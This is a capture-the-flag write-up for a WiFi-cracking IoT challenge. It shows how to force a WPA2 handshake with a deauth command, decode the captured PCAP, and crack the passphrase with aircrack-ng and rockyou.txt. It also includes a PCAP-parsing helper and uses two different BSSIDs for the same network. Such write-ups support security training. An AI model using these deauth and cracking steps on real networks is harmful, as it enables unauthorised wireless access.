# Cr4cK_W1F1

| Field | Value |
|-------|-------|
| Category | IoT |
| Difficulty | Medium |
| Points | TBD |
| Author | Eun0us |
| CTF | Espilon 2026 |

---

## Description

You recover UART access to a red team WiFi sniffer tool.
Analyze the captured data to recover the WiFi password, then connect to the network and retrieve the flag.

- TX (read UART): port 1111
- RX (write UART): port 2222

---

## TL;DR

Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART output (base64-encoded), crack the handshake with `aircrack-ng` and `rockyou.txt` to find the passphrase `sunshine`, then connect and read the flag.

---

## Tools

| Tool | Purpose |
|------|---------|
| `nc` | Connect to UART TX/RX ports |
| `base64` | Decode the PCAP blob |
| `aircrack-ng` | Crack WPA2 handshake |
| `rockyou.txt` | Password wordlist |

---

## Solution

### Step 1 — Open both UART channels

```bash
# Terminal 1 — TX (read output)
nc <host> 1111

# Terminal 2 — RX (send commands)
nc <host> 2222
```

> 📸 `[screenshot: two terminals showing TX output and RX prompt]`

### Step 2 — Start the sniffer and force a deauth

In the RX terminal:

```text
sniffer start
deauth TestNet 02:00:00:aa:00:01
sniffer stop
```

The deauthentication forces the target client to reconnect and redo the WPA2 4-way handshake, which the running sniffer captures.

### Step 3 — Extract the PCAP from TX

On the TX terminal, the capture is printed between two markers:

```text
PCAP_BASE64_BEGIN
<base64 data>
PCAP_BASE64_END
```

Copy the base64 lines to a file and decode:

```bash
base64 -d handshake.b64 > handshake.pcap
```

> 📸 `[screenshot: TX output showing the PCAP_BASE64 markers]`
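
The marker extraction in this step can be scripted instead of copied by hand. The Python helper below is an added example, not part of the original writeup or of the challenge's tooling: it pulls the base64 between `PCAP_BASE64_BEGIN` and `PCAP_BASE64_END` out of a saved TX log, decodes it, and checks the libpcap global header so that a dump that was cut off or corrupted by UART noise is caught before it is handed to `aircrack-ng`. The sample TX text and the 24-byte capture inside it are constructed for the example.

```python
import base64
import binascii
import struct

BEGIN_MARKER = "PCAP_BASE64_BEGIN"
END_MARKER = "PCAP_BASE64_END"

# libpcap global-header magic values and the struct byte order each one implies.
PCAP_MAGICS = {
    b"\xd4\xc3\xb2\xa1": "<",  # little-endian, microsecond timestamps
    b"\xa1\xb2\xc3\xd4": ">",  # big-endian, microsecond timestamps
    b"\x4d\x3c\xb2\xa1": "<",  # little-endian, nanosecond timestamps
    b"\xa1\xb2\x3c\x4d": ">",  # big-endian, nanosecond timestamps
}

def extract_pcap(tx_output: str) -> bytes:
    """Return the decoded PCAP carried between the BEGIN/END markers in the UART TX text."""
    lines = [line.strip() for line in tx_output.splitlines()]  # drop stray \r and spaces
    if BEGIN_MARKER not in lines:
        raise ValueError("PCAP_BASE64_BEGIN not found in TX output")
    start = lines.index(BEGIN_MARKER)
    try:
        end = lines.index(END_MARKER, start + 1)
    except ValueError as exc:
        raise ValueError("PCAP_BASE64_END missing: capture was cut off") from exc
    payload = "".join(lines[start + 1:end])  # the base64 may be wrapped over several lines
    try:
        return base64.b64decode(payload, validate=True)
    except binascii.Error as exc:
        raise ValueError("corrupt base64 between markers (UART noise?)") from exc

def pcap_link_type(data: bytes) -> int:
    """Parse the 24-byte pcap global header and return its link type (105 = IEEE 802.11)."""
    if len(data) < 24:
        raise ValueError("truncated pcap global header")
    order = PCAP_MAGICS.get(data[:4])
    if order is None:
        raise ValueError("not a libpcap file: bad magic")
    _major, _minor, _tz, _sig, _snaplen, linktype = struct.unpack(order + "HHiIII", data[4:24])
    return linktype

# Constructed sample: a bare pcap global header (no packets) for link type 105,
# base64-wrapped over two lines and surrounded by console noise like the sniffer prints.
SAMPLE_PCAP = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)
_b64 = base64.b64encode(SAMPLE_PCAP).decode()
SAMPLE_TX = "\n".join(["[sniffer] stopped, 0 frames", BEGIN_MARKER,
                       _b64[:16], _b64[16:], END_MARKER, "[sniffer] ready"])
```

Feed it the saved TX log and write the returned bytes to `handshake.pcap`; a link type other than 105 means the sniffer did not hand over an 802.11 capture.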

### Step 4 — Crack the WPA2 handshake

```bash
aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
```

Output:

```text
KEY FOUND! [ sunshine ]
```

> 📸 `[screenshot: aircrack-ng finding the key]`

### Step 5 — Connect and read the flag

In the RX terminal:

```text
connect TestNet sunshine
cat /flag.txt
```

> 📸 `[screenshot: RX terminal returning the flag after connecting to the network]`

---

## Flag

`CTF{CR4CK_W1F1_EXAMPLE}`

> Note: This challenge was still being finalized at time of writing. The flag above is
> a placeholder; the real flag will be updated before deployment.